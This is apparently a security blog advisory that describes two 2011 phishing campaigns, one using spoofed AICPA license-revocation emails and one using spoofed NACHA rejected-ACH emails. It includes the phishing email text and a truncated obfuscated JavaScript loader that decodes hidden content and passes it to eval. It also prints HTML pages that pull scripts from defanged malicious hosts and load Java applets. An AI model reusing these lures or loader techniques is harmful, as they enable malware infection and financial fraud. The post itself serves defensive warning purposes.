Emails regarding accountant license from AICPA leads to site with obfuscated Javascript exploit


MX Lab, http://www.mxlab.eu, is noticing some emails regarding the possibility that the account license from AICPA will be revoked duet tax return fraud accusations.

The emails have subjects like:

Fraudulant tax return assistance accusations.
Income tax fraud accusations.
Income tax return fraud accusations.
Tax return fraud accusations.
Your accountant license can be revoked.
Your accountant CPA license termination.
….

The email is send from the spoofed addresses like admin@aicpa.org, alerts@aicpa.org, risk@aicpa.org, info@aicpa.org, service@aicpa.org, risk.manager@aicpa.org, support@aicpa.org,…. and has the following body:

Dear accountant officer,

We have been informed of your recent assistance in tax return fraud on behalf of one of your clients. According to AICPA Bylaw Subsection 765 your Certified Public Accountant status can be revoked in case of the act of filing of a incorrect or fraudulent tax return for your client or employer.

Please find the complaint below below and provide your feedback to it within 7 days. The failure to do so within this term will result in cancellation of your Accountant status.

Here is an example of the message:

The message contains the URL “Complant.pdf” that leads to a web host where the HTML page is loaded with an obfuscated Javascript behind.

The obfuscated Javascript contains some code to open an iframe:

When I tried to access this page directly I got the following on my screen:

When viewing the HTML source code we found some additional coding:

<html><body><div style="display:none;"><p>@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p
^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p
^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p
@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp
@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-
......
......SHORTENED VERSION OF THE CODE.....
......
zpz^</p></div><script>
ss='s';g='g';r='r';
try{new window(123).asd;}catch(qq){aa=/s/g.exec("a"+"sd").index+[];e=eval;}
aaa=1+[];
i=0;
try{new window(123).qwey();}catch(qqq){
if(aaa==aa)
while(1){
	a=document.body.childNodes[i];
	if(a.tagName.toLowerCase() == "div") break;
	i++;
}
a=a.childNodes[0].innerHTML[r+'eplace'](/\^/g,"7")[r+'eplace'](/@/g,"5")
[r+'eplace'](/g/g,"6")[r+'eplace'](/z/g,"1")[r+'eplace'](/w/g,"8")
[r+'eplace'](/t/g,"9")[r+'eplace'](/o/g,"4");}
a=a.split("p");
md='a';
			c=[];
			i=0;
			p=parseInt;
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=String;}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr="fromChar";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr+="Code";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=qq[fr];}
if(aaa==aa){
			while(15042>i){
				vv=a[i];
				r2=cc=qq(41+1+p(vv));
				r=c;
				if(fr)c=r+r2;
				i=i+1;
			}
			w=e;
			w(c);
}
		</script></body></html>

Recommended action when you receive this type of message: delete and do not click on any of the embedded URLs at the top “View it in your browser”, the Complaint.pdf URL or at the end of the message where the email is.

Emails regarding rejected ACH payment contains security risk


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subjects like:

Rejected ACH transaction
Rejected ACH payment
Your ACH transfer

The email is send from the spoofed addresses like:

“\”The Electronic Payments Association\” risk.manager”@nacha.org
“\”The Electronic Payments Association\” alerts”@nacha.org
“\”The Electronic Payments Association\” risk”@nacha.org
“\”The Electronic Payments Association\” transfers”@nacha.org
“\”The Electronic Payments Association\” ach”@nacha.org
“\”The Electronic Payments Association\” payment”@nacha.org

The email has the following body:

The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.

Canceled transaction
Transaction ID: 02710822288793
Reason for rejection See details in the report below
Transaction Report report_02710822288793.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171

2011 NACHA – The Electronic Payments Association

A sample of the email:

The URLs for the transaction report are different and in some cases no longer valid. Some examples:

hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html

One of the URLs did give us a result: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.

When investigating the HTML code of this web page we got the following:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firstnamestore.com/utn08WYD/js.js”></script>
<script type=”text/javascript” src=”hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js”></script>
<script type=”text/javascript” src=”hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://paolomisirochi.com/nqrmZKRC/js.js”></script>
<script type=”text/javascript” src=”hxxp://lonnytyler.com/MZF0uXsc/js.js”></script>
<script type=”text/javascript” src=”hxxp://orquestrachapo.com/jAmCDzeM/js.js”></script>

</html>

As you can see, some Javascripts are loaded when opening this web page. Some URLs to the javascripts are also obsolete but some of them returns the code: “document.location=’hxxp://sulusate.com/forum/index.php?showtopic=997439′;”.

The above URL gives us the web page with the following code:

<body>
<applet code=’Verifa.class’ archive=’rhi.jar’ width=’24’ height=’22’>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs”>
</applet>
</body><body>
<applet code=’Ooo.class’ archive=’Ooo.jar’ width=’24’ height=’22’>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi”>
</applet>
</body>

When opening the URLs  in a web browser – something we do not recommend to even try – you will get redirected to bing.com or another web site so you won’t see this code.

It seems that some javascript is obfuscated and that .jar files are involved here inside an applet. The risk is that these applets in java could contain malicious code. Ooo.jar is however related to OpenOffice but in this case it can also be used for phishing.

This email is a security risk – a virus or a phishing attempt – for sure so do not follow any URLs or open files.

Follow

Get every new post delivered to your Inbox.

Join 341 other followers